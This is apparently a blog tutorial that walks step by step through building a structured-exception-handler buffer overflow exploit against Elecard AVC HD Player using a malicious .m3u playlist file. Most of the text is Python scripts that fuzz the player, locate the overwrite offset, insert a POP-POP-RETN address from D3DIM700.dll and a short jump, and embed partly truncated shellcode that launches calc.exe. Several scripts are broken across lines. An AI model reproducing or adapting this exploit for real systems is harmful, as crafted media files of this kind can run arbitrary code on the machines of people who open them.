Things that need to prepare are:
1. windows xp 3 (in virtual box)
2. Elecard player application, which is installed in windows)
2. Olly dbg (who already installed on windows)
3. understand the language python (here the user is using a back track 5)
First,
prepare the fuzzingFirst,
prepare the fuzzing
file="crash1.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="\x41" * 25000
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()
Now, Let's Run Elecard AVC HD Player
then,
open OllyDbg and Attach Elecard AVC HD Player applications. Choose Mpeg Player
Run
a fuzzer. And see the result.
To see the results, select the tab view - SEH Chain. And
The result is
Next,
try to make the pattern of 25000 byte through # pattern_create
root@bt:/opt/metasploit/msf3/tools#
./pattern_create.rb 25000
then, insert into fuzzer
#!usr/bin/pythonfile="crash2.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead="Aa0Aa1Aa . ."
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()
after
that try restarting OllyDbg and Electra. Rerun the fuzzer. So the
result
after
the result has been that we can, try to insert into # pattern_offset
root@bt:/opt/metasploit/msf3/tools#
./pattern_offset.rb 33614132
8
Let's try modification the fuzzer to check
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist
- song\n"
dead
="\x90" * 4
dead+="\xBB\xBB\xBB\xBB"
dead+="\x90"
* (25000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully
Created File ..."
file.close()
the resullt
further to find the module click menu view select Executable modules.
then all modules will appear., here users D3DIM700.dll use of modules. double click on the module.
after getting into the window of the file D3DIM700.dll CPU. search for right click -> sequence commands. fill in as below. and click find
Olly dbg will point to a memory address in the file that has a series of commands D3DIM700.dll POP, POP, RETN.
Now we've got that to offset 7394A0A6.
insert into fuzzer
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist
- song\n"
dead
="\x90" * 4
dead+="\xcc\xcc\xcc\xcc"
dead+="\xA6\xA0\x94\x73"
#address on D3DIM700.dll
dead+="\x90"
* (22000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully
Created File ..."
file.close()
we have successfully executed D3DIM700.dll module did break point by pressing F2.
The next press shif + F9.
olly dbg will then continue the process into memory. look on the left olly dbg look we have managed to do a command POP, POP, RETN.
problem that arises is that there are only a memory space of 5 bytes only. 5byte not enough to save the shell code
Try Modification the fuzzer
#!usr/bin/python
file="crash3.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist - song\n"
dead ="\x90" * 4
dead+="\xeb\x06\x90\x90"
dead+="\xA6\xA0\x94\x73" #address on D3DIM700.dll
dead+="\x90" * (22000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully Created File ..."
file.close()
The next step we create shell code., open your terminal and follow the commands as shown below:
after click generate., insert the payload into the fuzzer.
#!usr/bin/python
file="crashcalc.m3u"
head="#EXTM3U\n"
head+="#EXTINF:153,Artist
- song\n"
dead
="\x90" * 4
dead+="\xeb\x06\x90\x90"
#JMP SHORT
dead+="\xA6\xA0\x94\x73"
#address on D3DIM700.dll
dead+="\x90"
* 16
dead+=("\x29\xc9\x83\xe9\xde . .) # Calc.exe
dead+="\x90"
* (25000 - len(dead))
file=open(file,'w')
file.write(head+dead)
print"Succesfully
Created File ..."
file.close()
Now, try open Elecard AVC HD Player without Ollydbg and run the fuzzer.
Look what happen???
Elecard AVC HD Player Be a Calculator :-)
Good Luck !!!
0 komentar:
Posting Komentar